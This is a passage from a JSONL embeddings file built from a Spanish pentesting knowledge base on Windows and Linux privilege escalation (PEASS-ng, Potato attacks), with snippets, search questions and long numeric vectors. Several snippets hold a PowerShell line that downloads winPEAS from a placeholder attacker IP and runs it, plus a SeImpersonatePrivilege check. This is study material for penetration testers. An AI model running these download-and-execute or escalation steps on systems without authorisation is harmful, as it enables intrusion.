-0.00076, 0.00788, -0.05174, -0.08381, -0.05161, -0.00851, -0.03111, -0.00831, -0.02057, 0.05274, 0.06434, -0.02064, 0.02331, 0.03945, 0.06653, -0.01312, -0.04562, 0.01657, -0.07716, 0.06942, -0.01628, -0.01265, 0.01173, -0.03123, -0.00221, 0.13778, -0.06847, -0.03429, -0.05364, -0.04657, -0.01609, -0.00505, 0.00157, 0.04129, -0.09308, -0.01472, 0.04571, 0.10138, 0.09894, 0.00409, 0.10492, -0.01417, -0.03839, 0.01135, -0.00184, 0.0369, -0.05482, 0.05197, 0.02194, -0.0307, 0.04195, 0.03534, 0.07609, -0.01031, -0.03708, 0.02143, 0.01888, -0.03658, -0.00885, 0.00348, 0.00754, -0.023, 0.00842, -0.03972, -0.02154, -0.01509, -0.01679, -0.03306, -0.03923, -0.08954, 0.01544, -0.06749, 0.01147, 0.10112, 0.0555, -0.05312, 0.0054, 0.00365, 0.09741, 0.00761, -0.00278, 0.04122, 0.00702, 0.02086, -0.02727, 0.00794, 0.03211, 0.03602, 0.00488, 0.02796, 0.00868, 0.017, 0.02753, 0.00416, -0.04416, -0.00096, -0.0108, 0.00477, 0.01061, -0.02258, 0.01466, -0.00643, -0.03018, -0.00764, -0.04937, -0.01261, -0.02028, -0.0174, -0.0717, -0.03845, 0.11691, 0.00732, -0.05313, -0.04788, -0.00943, -0.05303, 0.00738, -0.0115, -0.02212, 0.02492, 0.01592, 0.05965, -0.02438, 0.01486, 0.09116]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Kali (servir): cd tu carpeta && python3 -m http.server 80 β†’ Transferencia de ficheros\n```\n```powershell", "indexar": "con que herramienta puedo transferir ficheros usando comandos sencillos de terminal?", "v": [0.16543, 0.08296, -0.17061, -0.19208, 0.11514, -0.12227, -0.00792, -0.02666, -0.07883, 0.0212, -0.10643, 0.03872, 0.04749, -0.06562, 0.06616, 0.03911, 0.08309, -0.1036, 0.03667, -0.09493, 0.04847, 0.01053, -0.0621, -0.05025, -0.01582, 0.01496, 0.05236, -0.07153, -0.17477, -0.10325, 0.11771, -0.00812, 0.19658, -0.01963, -0.02999, -0.031, -0.08226, 0.0224, -0.00858, 0.06737, 0.04821, 0.04651, -0.13687, 0.1061, -0.00807, -0.09802, -0.00169, -0.00598, 0.09675, -0.02658, 0.10355, -0.18026, -0.14678, 0.01143, -0.0936, -0.12478, 0.2539, -0.09658, 0.03312, 0.04832, -0.04251, -0.02035, 0.05515, 0.13753, 0.02494, -0.05114, 0.01047, -0.06151, -0.07465, 0.08249, -0.05745, 0.13444, -0.00091, 0.08907, -0.00367, 0.03863, -0.01153, -0.02483, 0.12104, 0.00707, 0.00284, -0.04831, -0.04471, -0.04348, -0.02129, -0.11804, -0.02739, 0.0061, -0.00084, -0.03739, 0.04388, -0.04392, 0.03411, -0.01678, 0.04164, 0.0487, -0.062, 0.01925, 0.00778, -0.07393, 0.07406, 0.0521, -0.06461, 0.1309, -0.00451, 0.01236, 0.0393, -0.12095, 0.03638, -0.04992, 0.07496, -0.05845, 0.10017, 0.00424, -0.00682, 0.03208, -0.01006, -0.02806, -0.07353, -0.07109, -0.04065, -0.00238, -0.00969, 0.04895, 0.02499, -0.05562, -0.06868, 0.06913, 0.03418, 0.01732, -0.03197, -0.01529, -0.0313, -0.01941, -0.05048, 0.05464, 0.05586, -0.07523, -0.01628, -0.0544, 0.00214, 0.05726, -0.03428, -0.0247, 0.05432, 0.04096, -0.01395, -0.01105, -0.05695, -0.07594, 0.08389, -0.04849, -0.08863, 0.02022, -0.05577, -0.00737, 0.00915, -0.00968, -0.14181, 0.02608, -0.06994, 0.00295, -0.02357, 0.02233, 0.00703, -0.04858, 0.00326, 0.00796, 0.04789, 0.03315, -0.00785, -0.00847, 0.05896, 0.00118, 0.04991, -0.05155, -0.08024, 0.01688, 0.02207, -0.0512, -0.04311, 0.01996, -0.04802, 0.01268, 0.01013, -0.04638, -0.02975, 0.02704, 0.02623, 0.02791, -0.00158, 0.10209, 0.02856, -0.01249, 0.01628, 0.01824, 0.00117, -0.05761, -0.03877, -0.00757, -0.03877, 0.01629, 0.05629, -0.11758, 0.06253, 0.0721, -0.09179, 0.01685, -0.01622, 0.00829, -0.01461, 0.0028, 0.07424, -0.02179, 0.00826, -0.03306, -0.04635, 0.02313, -0.01307, 0.00211, 0.0378, 0.0136, 0.03739, -0.01618, 0.02514, 0.06068, 0.02106, -0.0187, 0.02136, 0.04387, -0.00082, 0.04125, 0.00699, -0.05355, 0.06602, -0.03873, -0.0257, -0.01472, -0.04946, 0.00826, -0.0168, 0.03628, -0.00869, -0.04278, -0.02641, -0.03935, -0.08277, 0.00037, -0.0016, -0.0553, -0.02344, 0.00767, 0.04677, -0.04687, -0.02995, -0.03857]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Windows:\niwr http://TU_IP/winPEASx64.exe -OutFile C:\\Windows\\Temp\\wp.exe ; C:\\Windows\\Temp\\wp.exe\n```\n```bash", "indexar": "que herramienta puedo usar para recopilar informaciΓ³n bΓ‘sica de un sistema Windows?", "v": [-0.023, 0.13071, -0.15379, -0.21653, 0.04475, -0.15775, -0.07902, -0.11107, -0.06635, -0.12468, -0.12682, -0.08981, -0.04828, -0.04194, -0.01439, 5e-05, -0.02528, -0.1395, -0.06184, -0.06154, -0.00245, -0.03308, -0.12961, 0.00783, -0.14878, 0.07017, 0.03162, -0.10021, -0.18193, 0.03116, -0.01104, 0.02494, 0.04272, -0.05523, -0.16156, -0.01634, -0.0567, 0.06366, 0.04317, -0.01793, 0.00788, 0.07978, -0.01097, 0.08639, 0.07003, 0.00597, 0.03589, -0.03024, -0.03161, -0.04505, -0.04289, -0.12997, -0.15142, -0.04839, -0.00024, -0.18759, 0.20069, -0.11097, -0.01474, -0.02404, -0.02289, 0.07336, -0.05186, 0.0101, -0.01108, -0.01537, 0.02868, -0.12408, -0.03558, 0.10692, -0.00714, 0.0401, 0.10512, -0.02021, 0.01639, 0.04721, 0.03605, -0.03321, 0.12346, -0.01004, 0.03327, -0.0032, -0.05927, -0.03816, -0.03653, -0.13742, 0.10042, -0.03818, 0.02729, -0.14558, 0.03865, -0.01233, -0.07327, 0.01888, 0.10119, -0.02954, -0.01988, -0.05375, -0.06224, 0.0474, 0.07354, -0.14372, -0.04616, 0.0763, -0.05296, -0.01263, 0.00767, -0.06652, -0.03793, -0.10721, -0.0009, 0.05476, -0.01982, -0.01117, -0.0411, 0.05845, -0.01661, -0.04182, -0.02986, -0.03468, 0.04459, 0.09095, -0.07201, -0.08112, 0.08882, -0.02477, -0.01977, 0.09853, -0.03658, -0.00079, 0.06081, -0.02383, -0.09368, -0.00793, -0.03966, 0.01752, 0.00142, -0.03362, 0.03558, -0.0609, 0.0166, 0.11243, -0.03571, -0.09789, 0.04035, -0.00667, 0.08634, 0.0046, -0.02131, -0.06017, 0.06411, -0.06225, -0.01206, -0.01654, -0.01709, -0.02711, 0.0403, 0.01649, -0.02555, -0.03467, -0.01692, -0.05831, 0.01893, -0.01332, 0.01832, -0.04861, 0.05721, -0.017, 0.03879, 0.00912, 0.05476, 0.04631, 0.04062, -0.03781, 0.00053, -0.04278, -0.06022, -0.01241, -0.04804, -0.00994, -0.06288, 0.01976, -0.02101, -0.04409, 0.01659, 0.01878, -0.02211, 0.03391, -0.025, 0.0103, -0.04511, 0.04252, 0.07939, -0.04802, 0.01763, 0.00416, -0.01734, -0.04302, 0.0829, 0.04391, -0.03876, 0.0382, -0.0206, -0.05747, 0.08419, 0.06957, -0.03972, -0.01984, 0.04628, 0.05014, 0.03596, -0.01284, 0.01602, -0.05833, -0.02703, -0.02674, -0.0034, 0.02365, -0.02518, -0.03088, 0.03916, 0.01955, 0.02271, 0.05006, -0.00877, -0.01187, -0.03255, 0.01703, -0.00606, -0.03791, 0.05219, -0.01413, 0.02602, -0.00737, -0.0025, -0.06192, -0.01651, 0.01371, -0.0578, -0.02906, -0.01874, 0.10645, -0.01405, -0.04041, -0.06048, -0.04434, -0.00722, -0.02787, -0.01208, -0.13535, -0.00196, -0.00704, 0.07134, -0.04693, -0.01876, 0.02403]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Windows:\niwr http://TU_IP/winPEASx64.exe -OutFile C:\\Windows\\Temp\\wp.exe ; C:\\Windows\\Temp\\wp.exe\n```\n```bash", "indexar": "cual es una tecnica para escanear la configuracion inicial de un equipo bajo mi control?", "v": [-0.07601, -0.04991, -0.20234, -0.10382, 0.09994, -0.21743, -0.04902, -0.01714, -0.05806, 0.01469, -0.15773, 0.03432, -0.01915, 0.00162, 0.08491, 0.05629, 0.12454, -0.07286, 0.12827, 0.0701, -0.05241, -0.05457, 0.03099, 0.03124, 0.01011, -0.02848, 0.00221, -0.02289, -0.19533, -0.12981, -0.02454, 0.12741, 0.0944, 0.0302, 0.03806, -0.01755, 0.01665, 0.02676, 0.0764, 0.10923, -0.1876, -0.18754, -0.08396, -0.00106, 0.18665, -0.01333, 0.09494, 0.07946, 0.00288, 0.00727, -0.01492, 0.07016, 0.00752, -0.04409, -0.08711, -0.13153, 0.14464, -0.09102, 0.06757, -0.08944, -0.01162, -0.08052, 0.015, 0.04865, -0.016, 0.05586, -0.11492, -0.10542, -0.00836, -0.02399, -0.01207, 0.01974, -0.0498, -0.08196, 0.0322, 0.03565, 0.00532, 0.07292, 0.1716, -0.03649, 0.02119, 0.03387, -0.19918, 0.0107, -0.0487, -0.02653, 0.00268, -0.04494, 0.02032, -0.04911, 0.00631, -0.10825, -0.05201, -0.05941, 0.01087, -0.00919, 0.06738, 0.10362, -0.08655, 0.01038, 0.03827, -0.00094, -0.12453, 0.17209, 0.03233, 0.06457, 0.1096, -0.08386, 0.01728, -0.00263, -0.0191, 0.05826, -0.07906, 0.08522, -0.0511, -0.05023, -0.01224, 0.00587, -0.00554, -0.05777, 0.00331, -0.014, 0.03519, -0.0311, 0.02905, -0.02404, 0.03408, -0.00027, 0.07958, 0.09077, -0.04748, -0.01892, -0.0358, -0.01435, -0.115, 0.0233, 0.00854, -0.04445, -0.0455, -0.01109, -0.01549, 0.08683, -0.01348, -0.04444, 0.08769, -0.04263, -0.00023, -0.06014, 0.00714, 0.02666, -0.02721, 0.06424, 0.02515, 0.04617, -0.04672, 0.0476, 0.02076, 0.00629, -0.02215, 0.05411, -0.01265, -0.01536, 0.02703, -0.06685, 0.02926, -0.08638, -0.03274, -0.04152, 0.02469, -0.01457, -0.06888, -0.03754, -0.01954, -0.03288, 0.02683, -0.01596, 0.00073, -0.09206, -0.02232, -0.00916, -0.02272, 0.00822, 0.02144, 0.0137, 0.04081, 0.00355, -0.02818, 0.03117, -0.02181, 0.00337, -0.01863, 0.00779, 0.00711, -0.06082, -0.02352, -0.00235, -0.01002, -0.05259, -0.02341, 0.03236, 0.03726, -0.00175, 0.00347, -0.02872, 0.01508, 0.00301, -0.01186, -0.07813, -0.02867, 0.01985, 0.06851, 0.01195, 0.02397, 0.01938, -0.05713, 0.00242, 0.04152, -0.00278, 0.00591, -0.02656, 0.05528, -0.02475, 0.11543, -0.01096, -0.05028, -0.04257, -0.01414, 0.03422, -0.02032, -0.0361, -0.01863, -0.01432, 0.01029, 0.00223, 0.01636, 0.00343, 0.06062, -0.0331, -0.01522, -0.00354, 0.05516, 0.05573, -0.01729, -0.02447, -0.03715, -0.01291, -0.0773, -0.01032, -0.04336, -0.01988, 0.04189, 0.05676, 0.00416, -0.06693, 0.02148, -0.03931]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "# Windows:\niwr http://TU_IP/winPEASx64.exe -OutFile C:\\Windows\\Temp\\wp.exe ; C:\\Windows\\Temp\\wp.exe\n```\n```bash", "indexar": "con que metodo puedo verificar si hay cuentas adicionales o accesos no deseados en una PC?", "v": [0.20065, 0.25787, -0.2123, -0.03839, 0.08393, -0.058, 0.14823, -0.07203, -0.15967, -0.08256, -0.0318, 0.03021, -0.10222, -0.06486, 0.11273, -0.06514, 0.109, 0.0116, 0.0926, 0.03659, 0.10547, -0.21879, -0.14257, -0.05069, -0.05172, 0.13912, 0.02597, -0.02728, -0.10231, 0.03293, -0.01412, 0.00758, 0.01858, -0.00482, -0.0237, -0.02178, 0.00233, 0.06128, 0.00491, -0.00102, -0.00913, 0.08393, -0.02745, -0.01367, 0.06842, -0.11693, 0.0029, 0.07541, -0.03756, 0.00768, 0.07366, 0.01063, -0.19582, 0.01084, -0.12912, -0.0696, 0.03503, 0.01335, -0.01023, -0.08103, -0.02267, 0.07727, 0.09616, 0.09571, -0.07755, 0.0556, 0.08035, 0.10816, 0.00958, 0.06152, -0.10204, 0.0517, 0.00293, 0.01651, -0.06384, -0.02994, 0.06029, -0.06526, 0.10708, -0.03808, -0.03429, -0.03394, -0.04274, -0.00724, -0.12697, -0.0459, 0.02753, -0.09834, 0.04609, -0.08432, 0.03299, -0.03278, -0.00231, 0.03529, -0.04406, 0.04365, 0.0454, 0.05615, -0.04184, 0.08499, 0.06305, 0.02285, -0.07615, 0.0987, -0.0456, 0.06172, 0.0219, -0.07226, 0.03177, -0.02591, -0.04205, 0.02092, -0.09518, -0.0279, -0.02549, 0.03343, -0.06618, -0.03366, -0.04308, -0.04213, -0.0528, -0.04279, -0.0288, 0.06046, -0.01521, -0.1085, -0.0181, 0.07934, -0.00567, -0.0003, -0.0076, -0.0527, -0.04668, 0.00291, -0.02339, 0.00198, -0.10381, -0.03828, -0.01958, 0.01289, -0.03254, 0.03362, 0.03395, -0.09069, 0.05015, 0.0164, -0.04849, -0.03369, -0.13051, -0.01601, 0.06171, -0.02647, -0.03708, 0.11191, -0.03721, 0.0136, 0.05732, 0.0017, -0.02899, 0.10999, -0.03309, 0.05425, -0.014, -0.02017, -0.0029, -0.04939, -0.04341, -0.04374, 0.01882, -0.05796, -0.06231, 0.04089, 0.01006, -0.04677, 0.01118, -0.00562, -0.02301, -0.08163, 0.00865, 0.03224, -0.07544, 0.04354, -0.02856, -0.08073, -0.03411, -0.02211, 0.0192, 0.02303, 0.03603, 0.03512, 0.02737, 0.02312, -0.01824, -0.01446, 0.00335, -0.00542, 0.01591, -0.00416, 0.01695, -0.02157, -0.03257, 0.06764, 0.00075, -0.06193, 0.05656, 0.05999, -0.0329, 0.03075, -0.02407, 0.01698, 0.04833, -0.09614, 0.06162, -0.08957, -0.03422, -0.00053, -0.02458, -0.03153, -0.04263, 0.02854, 0.0471, 0.01835, 0.03094, 0.02405, 0.04311, -0.01151, 0.01614, 0.05149, 0.00635, 0.04464, -0.02234, -0.00477, -0.03039, -0.00878, 0.03199, 0.03929, 0.02723, -0.03594, -0.01389, -0.04213, 0.05197, 0.05465, 0.03792, -0.0457, -0.02958, -0.0358, -0.11527, -0.01006, -0.01283, -0.08847, 0.04793, -0.00463, 0.00109, -0.02946, 0.02707, -0.04299]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Regla de oro\n**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lΓ³gica de un script cron concreto).\n\nRelacionado: GTFOBins y LOLBAS Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "que herramienta me ayuda a automatizar pero tambiΓ©n a revisar manualmente las vulnerabilidades", "v": [0.13817, 0.19011, -0.19362, -0.13028, 0.06151, 0.00339, -0.08196, -0.05815, -0.14172, -0.09579, -0.03601, -0.13668, 0.01087, 0.0249, 0.09539, 0.02123, 0.01434, -0.09096, 0.00922, 0.06288, 0.07755, -0.09691, -0.05716, -0.00627, -0.07383, 0.031, 0.10659, -0.03007, -0.21072, -0.01978, -0.0205, 0.01771, 0.06799, 0.01381, -0.07632, 0.00224, 0.02533, 0.02453, 0.02409, 0.07998, 0.0273, 0.10744, -0.06625, 0.05551, 0.06597, 0.00108, -0.03491, 0.03935, -0.00262, 0.07002, -0.0816, -0.10673, -0.10139, -0.06359, -0.0058, -0.12441, 0.29586, -0.11165, 0.04107, -0.11829, -0.04613, 0.07249, 0.00038, 0.10425, -0.00461, 0.02161, 0.00269, -0.12904, -0.08646, 0.15873, -0.0075, 0.01667, -0.02664, -0.02215, -0.08061, -0.03312, 0.03253, 0.04953, 0.06726, -0.07458, -0.00729, -0.01672, 0.01504, 0.07372, -0.07647, -0.12806, 0.0403, -0.02236, 0.01933, -0.10418, 0.01959, -0.06141, -0.02879, -0.03394, 0.01405, 0.03712, 0.10751, -0.0448, -0.03106, 0.00248, 0.0952, -0.12372, 0.01352, 0.07433, 0.08975, 0.02263, -0.004, 0.03193, -0.07501, -0.03441, 0.02356, 0.04455, 0.00541, -0.02513, -0.02623, 0.0648, -0.00583, -0.04746, 0.01125, -0.08262, -0.00278, -0.04711, -0.03741, -0.03518, 0.00593, -0.01493, 0.00269, 0.10228, 0.01743, -0.08851, -0.00967, -0.02187, -0.07276, -0.02368, 0.03502, 0.05248, -0.03065, -0.10289, -0.06501, -0.01369, 0.002, 0.06958, 0.05408, -0.07541, 0.09201, -0.02291, 0.00865, -0.0709, -0.03571, 0.06705, 0.05619, -0.01541, 0.07931, 0.05293, -0.03062, 0.04414, -0.02236, 0.02451, -0.05905, 0.05765, -0.02373, -0.01465, 0.00418, 0.01042, -0.01674, -0.04359, 0.0588, 0.01968, 0.09436, -0.01708, -0.02145, 0.02122, 0.00401, 0.02642, -0.00837, -0.07347, 0.03677, -0.00457, 0.00942, -0.04345, -0.01846, -0.02888, -0.00746, -0.0516, 0.00396, -0.03383, 0.03823, -0.03923, 0.06725, 0.06632, -0.01782, 0.02725, -0.03647, -0.02056, 0.05045, 0.01079, -0.07879, -0.01186, -0.00972, -0.05407, -0.03439, 0.01526, -0.01456, -0.07671, 0.06219, 0.08817, -0.04208, 0.01095, 0.00639, 0.03963, 0.02596, -0.01213, 0.10315, -0.03801, -0.01478, -0.03964, -0.02185, 0.00158, -0.04232, -0.05101, 0.02925, -0.05178, 0.11396, 0.00567, -0.01383, 0.02478, 0.08532, 0.03727, 0.00596, 0.03217, -0.02071, -0.00258, -0.02167, -0.03974, 0.06424, -0.03033, 0.06391, -0.03959, -0.02421, -0.03328, 0.06708, 0.04035, 0.00204, -0.07386, -0.02761, -0.0439, -0.03379, 0.00369, -0.02469, -0.04581, -0.01746, 0.06538, 0.05322, -0.08215, 0.01027, -0.08431]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Regla de oro\n**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lΓ³gica de un script cron concreto).\n\nRelacionado: GTFOBins y LOLBAS Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "con que puedo detectar credenciales ocultas en sistemas Windows o Linux sin instalar nada extra", "v": [-0.03942, 0.07534, -0.19711, -0.14647, 0.03644, -0.08932, -0.16793, 0.02041, -0.10459, -0.03064, -0.037, -0.05453, -0.09233, -0.08572, 0.0907, -0.0381, -0.03457, -0.13576, 0.027, -0.10613, -0.08301, -0.07496, -0.09732, -0.06816, 0.0745, 0.04921, -0.00867, -0.08665, 0.01432, -0.03735, -0.05891, 0.04571, 0.02852, 0.04259, -0.1078, 0.06165, -0.12768, -0.04289, 0.11185, 0.08383, 0.14416, 0.08817, 0.06114, 0.11146, 0.06763, -0.11463, 0.02096, -0.03368, 0.07001, -0.13996, -0.02193, -0.04573, -0.12312, -0.11788, 0.07823, -0.12152, 0.12209, -0.04112, 0.13086, 0.00209, -0.07806, 0.16179, 0.00513, 0.05106, 0.07774, 0.02931, -0.03715, -0.03331, -0.0684, 0.04246, -0.02915, 0.04731, 0.04291, 0.05317, 0.05204, 0.07918, -0.05429, -0.00932, 0.11048, -0.02181, 0.04745, 0.01653, 0.03762, 0.05085, -0.04403, -0.15704, -0.06471, 0.0358, -0.03593, -0.05176, 0.08231, 0.02071, -0.02858, 0.08879, 0.11632, -0.04931, 0.08758, 0.03787, -0.05, 0.04926, -0.06198, -0.06868, -0.04614, 0.15546, -0.05336, 0.00127, 0.02298, -0.06279, 0.04765, -0.11238, 0.03335, 0.03364, -0.00784, -0.05256, -0.01032, 0.01009, 0.0336, -0.00688, -0.06064, 0.04965, -0.08431, -0.04849, -0.02241, 0.01082, 0.00575, -0.1189, -0.06902, 0.11283, -0.03248, -0.01856, 0.01255, -0.09802, -0.00131, 0.0217, -0.09214, 0.06568, -0.03732, -0.04223, -0.0339, 0.02466, 0.04247, 0.08639, 0.02753, -0.0244, 0.08297, 0.04796, -0.00285, -0.03389, 0.00367, -0.09612, 0.03223, 0.06404, -0.00252, 0.00633, -0.06065, 0.00281, 0.11215, 0.02141, 0.02171, -0.03734, 0.00277, 0.03055, -0.02332, 0.01121, -0.0433, 0.00816, -0.03791, 0.0151, 0.0682, 0.02578, -0.00465, 0.07529, -0.02516, -0.0673, 0.03988, -0.03266, 0.07367, -0.07334, 0.03726, -0.00795, -0.06604, 0.06091, 0.04853, -0.06145, 0.01155, 0.03811, -0.05204, 0.01081, -0.02486, -0.00052, 0.07572, -0.01191, -0.00786, -0.00289, -0.01551, 0.0264, 0.00027, -0.05184, -0.00063, 0.00985, -0.09887, 0.0656, -0.0183, -0.04866, 0.05049, 0.03682, -0.03815, 0.05303, 0.03312, 0.05045, 0.04725, 0.00867, 0.01986, -0.09717, -0.03598, -0.02724, 0.02033, 0.02185, -0.00385, -0.04037, 0.00798, 0.01156, 0.07276, 0.00272, 0.01832, -0.09077, -0.04756, 0.03906, 0.0354, -0.00183, 0.01318, 0.01089, 0.00579, 0.01721, -0.00315, -0.01915, 0.00689, -0.00402, -0.02027, -0.02259, -0.02244, 0.07552, 0.03447, -0.10359, -0.07627, -0.05349, -0.03658, 0.00372, 0.00157, -0.0608, -0.03384, 0.04039, 0.04906, -0.06303, 0.00136, 0.04745]} +{"tipo": "pregunta", "herramienta": "PEASS-ng", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/PEASS-ng.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## Regla de oro\n**Automatizado + manual.** winPEAS resalta lo sospechoso (rojo/amarillo), pero **revisa a mano** Privesc Windows / Privesc Linux: winPEAS no encuentra todo (ej. lΓ³gica de un script cron concreto).\n\nRelacionado: GTFOBins y LOLBAS Β· MetodologΓ­a OSCP Β· OSCP MOC", "indexar": "cual programa sirve para encontrar fallos de acceso que otras herramientas pasan por alto", "v": [0.05284, 0.09249, -0.13065, -0.11218, -0.04307, -0.16549, 0.06543, -0.14429, -0.15938, 0.02408, -0.14857, -0.09365, -0.12806, 0.00497, 0.10306, -0.01323, 0.07372, -0.14248, 0.02682, 0.07906, -0.08177, 0.02128, -0.09652, -0.07486, -0.12988, -0.01337, 0.05592, -0.07465, -0.15684, 0.02129, 0.14796, -0.03419, -0.00214, -0.14291, -0.00193, -0.10372, -0.0215, 0.06831, 0.00985, 0.10357, 0.04444, -0.00041, -0.06438, -0.0114, 0.02596, -0.14318, 0.01283, 0.0547, 0.04745, 0.04844, -0.02856, -0.10923, 0.04633, 0.00283, 0.06642, -0.17247, 0.08992, -0.02968, -0.05585, -0.07572, -0.13262, -0.0662, -0.01578, -0.07413, -0.02544, -0.1084, 0.03515, -0.01647, -0.06577, 0.04518, -0.05455, -0.03508, 0.03781, -0.03288, -0.00201, -0.0178, -0.02155, 0.02363, 0.09909, -0.08034, -0.04105, 0.01421, -0.05751, 0.02768, -0.10718, -0.02703, 0.10132, -0.0476, -0.03428, -0.0917, 0.02847, 0.12814, 0.02636, 0.00269, 0.07809, -0.04191, 0.11786, -0.02051, 0.01494, 0.02081, 0.09953, -0.09042, -0.0414, 0.10333, -0.09148, 0.07942, 0.0309, -0.00342, -0.05303, 0.04719, 0.01473, 0.0571, 0.03525, -0.04066, -0.06837, -0.00734, -0.06042, -0.08583, -0.023, -0.06301, -0.01759, 0.0246, -0.06086, 0.00129, 0.04256, 0.0107, 0.03118, 0.05237, -0.00095, -0.02092, 0.0611, 0.02082, -0.04326, -0.04987, -0.04581, -0.11455, 0.09611, -0.03142, -0.02034, -0.06005, 0.07813, 0.03413, 0.00519, -0.02804, 0.02372, -0.05492, -0.002, -0.05323, -0.02236, -0.04831, -0.02975, 0.02042, 0.00395, 0.07584, -0.05531, -0.03103, -0.04445, 0.01416, -0.06402, 0.04656, -0.12718, -0.00051, 0.02367, -0.01063, 0.04201, -0.06087, -0.00338, 0.04275, 0.07946, 0.03408, -0.05104, 0.06706, 0.00325, -0.13303, -0.0835, -0.07207, -0.04641, -0.12304, 0.03459, -0.02813, -0.05348, 0.04326, -0.00506, 0.03806, 0.00464, -0.07531, -0.00066, -0.01097, 0.05844, -0.00484, -0.00889, 0.00388, -0.05625, -0.04664, 0.01831, 0.03767, -0.06479, -0.07465, 0.02657, -0.05079, -0.04304, 0.02336, -0.02118, -0.07252, 0.02, 0.05671, -0.03133, -0.02593, 0.00882, 0.10998, 0.03079, -0.03062, 0.11065, -0.03641, -0.04967, -0.04274, -0.00671, 0.03808, 0.01408, 0.0326, 0.03926, -0.02965, 0.04052, 0.04236, -0.00957, -0.06758, 0.01538, 0.00956, -0.00269, 0.03809, -0.03099, -0.0477, -0.02857, -0.04848, 0.01171, -0.05704, 0.01975, -0.03109, -0.03991, -0.06889, 0.02326, 0.08217, 0.04048, -0.04425, 0.00891, 0.01829, -0.04745, -0.03778, -0.01088, -0.03976, -0.04725, 0.03705, 0.00621, -0.03438, 0.05547, -0.00869]} +{"tipo": "pregunta", "herramienta": "Potato attacks", "perfil": "PENTESTERS", "fichero": "conocimiento/04 - Privesc/Potato attacks.md", "tema": "privesc", "fuente": null, "licencia": null, "texto": "## El gatillo\n```\nwhoami /priv β†’ busca SeImpersonatePrivilege = Enabled\n```\nTΓ­pico en cuentas de servicio (IIS, MSSQL `sa`, etc.).", "indexar": "cΓ³mo verificar si una cuenta tiene el privilegio de impersonaciΓ³n", "v": [-0.0604, 0.24524, -0.11624, -0.02809, 0.19876, -0.08612, 0.11338, -0.08374, -0.08274, -0.17786, 0.013, -0.03208, -0.00059, -0.00987, 0.06981, -0.01182, 0.07063, -0.05951, 0.0526, 0.08365, 0.12888, -0.14062, 0.03147, -0.06991, -0.02755, 0.02177, 0.02783, -0.03178, -0.09115, 0.04469, 0.03821, -0.06162, -0.01748, -0.0345, 0.04545, 0.00778, 0.05072, 0.09823, 0.00509, 0.03292, 0.01942, 0.07296, 0.00592, 0.06297, 0.00643, -0.05731, -0.0876, 0.08976, -0.02213, 0.02961, 0.03557, 0.09353, -0.07705, 0.00678, -0.09356, 0.0172, -0.07567, 0.08378, 0.05851, 0.03097, -0.0049, -0.07281, 0.05539, 0.1157, -0.0688, 0.03121, 0.04728, 0.00533, -0.00139, -0.03577, -0.06035, -0.02993, -0.07048, 0.02653, -0.08857, -0.06869, 0.02954, -0.02995, 0.04394, -0.055, 0.02156, 0.01655, -0.02811, 0.05793, -0.14094, -0.04034, 0.01786, -0.03925, 0.0225, -0.08454, -0.00099, 0.07282, 0.01282, -0.02888, -0.00948, 0.05963, 0.03328, 0.04668, -0.01926, 0.04671, 0.13269, -0.07077, -0.04141, 0.14175, 0.00163, 0.05378, 0.04011, -0.12027, -0.07903, -0.08177, -0.03817, -0.00679, -0.12304, -0.01496, -0.02766, 0.07279, -0.06045, -0.13617, 0.06623, -0.0407, -0.09176, -0.04697, 0.00259, -0.04661, 0.01891, -0.07578, -0.0371, 0.07989, 0.05023, 0.08406, -0.02145, -0.05105, -0.04697, -0.02516, 0.03221, -0.05598, -0.09247, -0.0462, -0.06111, -0.06187, 0.04139, -0.00479, 0.05264, -0.096, 0.10865, 0.01841, -0.04059, -0.02577, -0.15679, 0.01122, -0.02755, -0.05495, -0.02648, 0.11977, -0.06095, -0.00577, -0.02677, -0.05452, 0.06477, 0.02926, 0.04218, -0.0599, -0.03082, -0.01698, 0.09067, -0.00166, -0.02487, -0.10341, 0.08185, -0.08598, -0.04038, -0.00242, -0.04963, -0.04381, -0.04181, -0.03566, 0.00541, 0.00948, 0.05099, -0.00397, -0.09887, 0.05719, 0.01457, -0.0203, -0.05005, -0.05712, -0.0062, -0.00021, 0.04923, 0.08685, 0.04777, 0.06786, 0.00796, 0.07422, -0.00982, -0.02734, -0.02587, 0.02858, 0.0043, -0.00663, -0.04538, -0.02425, -0.01369, -0.06172, -0.03077, -0.02021, -0.01092, -0.04557, -0.04093, 0.04927, 0.06054, -0.03044, 0.07786, -0.05625, -0.09094, -0.01623, 0.03775, -0.07119, -0.04678, -0.00874, 0.05058, 0.0134, 0.07881, 0.03011, 0.04314, 0.01116, 0.03804, 0.02201, 0.03005, 0.11709, -0.02347, 0.05671, 0.01843, -0.06892, 0.09821, 0.05367, 0.08582, -0.01883, 0.00965, -0.05654, 0.07379, 0.10872, -0.01491, -0.05684, 0.00861, -0.00546, -0.10502, -0.01068, -0.00797, -0.07313, 0.05909, -0.00848, 